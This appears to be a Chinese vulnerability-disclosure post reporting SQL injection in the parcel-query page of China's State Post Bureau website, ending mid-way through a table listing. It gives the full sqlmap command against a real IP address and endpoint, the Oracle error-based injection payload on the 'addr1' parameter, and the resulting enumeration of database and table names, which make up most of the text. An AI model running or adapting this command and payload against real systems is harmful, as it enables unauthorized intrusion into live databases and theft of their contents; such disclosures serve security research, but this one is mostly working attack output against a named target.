国家邮政局SQL注射中华人民共和国国家邮政局 SQL注入 SQLMAP 验证
http://www.spb.gov.cn/folder9/folder2047/index.html
包裹查询功能
然后SQLMAP试着跑表
C:\Users\Administrator>sqlmap.py -u "219.141.228.193:8080/express/maincheck_pk.jsp" --data="radiobutton=2&addr1=a&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1" --tables
sqlmap identified the following injection points with a total of 46 HTTP(s) requests:
---
Place: POST
Parameter: addr1
Type: error-based
Title: Oracle OR error-based - WHERE or HAVING clause (XMLType)
Payload: radiobutton=2&addr1=-8379') OR 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(105)||CHR(97)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(116)||CHR(103)||CHR(113)||CHR(62))) FROM DUAL) AND ('TFti'='TFti&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1
---
web application technology: JSP
back-end DBMS: Oracle
Database: EXFSYS
[1 table]
+--------------------------------+
| RLM$PARSEDCOND |
+--------------------------------+
Database: OLAPSYS
[9 tables]
+--------------------------------+
| CWM2$AWCUBECREATEACCESS |
| CWM2$AWDIMCREATEACCESS |
| CWM2$_AW_NEXT_TEMP_CUST_MEAS |
| CWM2$_AW_TEMP_CUST_MEAS_MAP |
| CWM2$_TEMP_VALUES |
| OLAP_SESSION_CUBES |
| OLAP_SESSION_DIMS |
| XML_LOAD_LOG |
| XML_LOAD_RECORDS |
+--------------------------------+
Database: EXPRESS
[38 tables]
+--------------------------------+
| F_AREAMEM_IN |
| F_AREAMEM_IN_HIS |
| F_AREAMEM_IN_TEM |
| F_AREAMEM_OUT |
| F_AREAMEM_OUT_HIS |
| F_AREAMEM_OUT_TEM |
| F_AREAMEM_OUT__ |
| F_AREA_IN |
| F_AREA_IN_HIS |
| F_AREA_IN_TEM |
| F_AREA_OUT |
| F_AREA_OUT_HIS |
| F_AREA_OUT_TEM |
| F_ARRAY |
| F_ARRAY_HIS |
| F_ARRAY_TEM |
| F_CPY |
| F_PROD |
| LOG_EXPRESS |
| LOG_EXPRESS_STAT |
| LOG_PACKAGE |
| LOG_PACKAGE_STAT |
| LOG_SYS_OPT |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| PC2DIST |
| PK_AREAMEM |
| PK_AREAS |
| PK_ARRAY |
| S_CITY |
| S_DIST |
| S_FIELDVALUE |
| S_PROV |
| S_QUERY_TYPE |
| TEST |
+--------------------------------+
Database: SYSTEM
[8 tables]
+--------------------------------+
| DEF$_TEMP$LOB |
| HELP |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARTITION |
| OL$ |
| OL$HINTS |
| OL$NODES |
+--------------------------------+
Database: SYS
[30 tables]
+--------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| AW$AWCREATE |
| AW$AWCREATE10G |
| AW$AWMD |
| AW$AWREPORT |
| AW$AWXML |
| AW$EXPRESS |
| IMPDP_STATS |
| KU$NOEXP_TAB |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| OLAPI_HISTORY |
| OLAPI_IFACE_OBJECT_HISTORY |
| OLAPI_IFACE_OP_HISTORY |
| OLAPI_MEMORY_HEAP_HISTORY |
| OLAPI_MEMORY_OP_HISTORY |
| OLAPI_SESSION_HISTORY |
| OLAPTABLEVELS |
| OLAPTABLEVELTUPLES |
| OLAP_OLEDB_FUNCTIONS_PVT |
| OLAP_OLEDB_KEYWORDS |
| OLAP_OLEDB_MDPROPS |
| OLAP_OLEDB_MDPROPVALS |
| PLAN_TABLE$ |
| PSTUBTBL |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
| WRI$_ADV_ASA_RECO_DATA |
+--------------------------------+
Database: MDSYS
[36 tables]
+--------------------------------+
| OGIS_GEOMETRY_COLUMNS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES |
| SDO_COORD_AXIS_NAMES |
| SDO_COORD_OPS |
| SDO_COORD_OP_METHODS |
| SDO_COORD_OP_PARAMS |
| SDO_COORD_OP_PARAM_USE |
| SDO_COORD_OP_PARAM_VALS |